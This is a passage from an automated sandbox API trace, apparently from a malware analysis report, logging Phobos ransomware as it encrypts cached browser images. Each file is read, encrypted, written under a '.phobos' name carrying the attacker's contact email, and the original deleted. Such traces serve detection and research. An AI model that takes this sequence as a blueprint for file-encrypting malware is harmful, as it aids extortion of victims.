Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbveow[1].jpg")) returned 1 [0174.591] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.607] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2728) returned 1 [0174.607] CloseHandle (hObject=0x158) returned 1 [0174.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg")) returned 0x2020 [0174.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.608] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.608] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0174.608] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.608] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xaa8, lpOverlapped=0x0) returned 1 [0174.712] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xab0, dwBufLen=0xab0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xab0) returned 1 [0174.713] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xab0, lpOverlapped=0x0) returned 1 [0174.715] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0174.715] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.715] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.715] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.715] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.715] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.715] CloseHandle (hObject=0x158) returned 1 [0174.715] CloseHandle (hObject=0x148) returned 1 [0174.716] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvizi[1].jpg")) returned 1 [0174.716] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.717] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2008) returned 1 [0174.717] CloseHandle (hObject=0x148) returned 1 [0174.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg")) returned 0x2020 [0174.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.717] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.717] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0174.718] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.718] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7d8, lpOverlapped=0x0) returned 1 [0174.753] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7e0, dwBufLen=0x7e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7e0) returned 1 [0174.753] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7e0, lpOverlapped=0x0) returned 1 [0174.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0174.754] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.754] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.754] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.754] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.754] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.754] CloseHandle (hObject=0x148) returned 1 [0174.754] CloseHandle (hObject=0x158) returned 1 [0174.754] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvxm8[1].jpg")) returned 1 [0174.755] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.755] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2263) returned 1 [0174.755] CloseHandle (hObject=0x158) returned 1 [0174.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg")) returned 0x2020 [0174.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0174.756] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.756] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8d7, lpOverlapped=0x0) returned 1 [0174.782] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8e0) returned 1 [0174.782] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8e0, lpOverlapped=0x0) returned 1 [0174.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0174.782] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.782] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.782] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.782] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.783] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.783] CloseHandle (hObject=0x158) returned 1 [0174.783] CloseHandle (hObject=0x148) returned 1 [0174.783] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg")) returned 1 [0174.784] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0174.837] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13224) returned 1 [0174.837] CloseHandle (hObject=0x178) returned 1 [0174.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg")) returned 0x2020 [0174.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0174.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0174.838] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.838] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x33a8, lpOverlapped=0x0) returned 1 [0174.858] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33b0, dwBufLen=0x33b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33b0) returned 1 [0174.858] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x33b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x33b0, lpOverlapped=0x0) returned 1 [0174.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0174.859] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.859] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.859] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.859] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.859] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0174.859] CloseHandle (hObject=0x178) returned 1 [0174.859] CloseHandle (hObject=0x148) returned 1 [0174.859] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg")) returned 1 [0174.860] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.861] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1848) returned 1 [0174.861] CloseHandle (hObject=0x148) returned 1 [0174.861] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg")) returned 0x2020 [0174.861] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.862] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.862] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 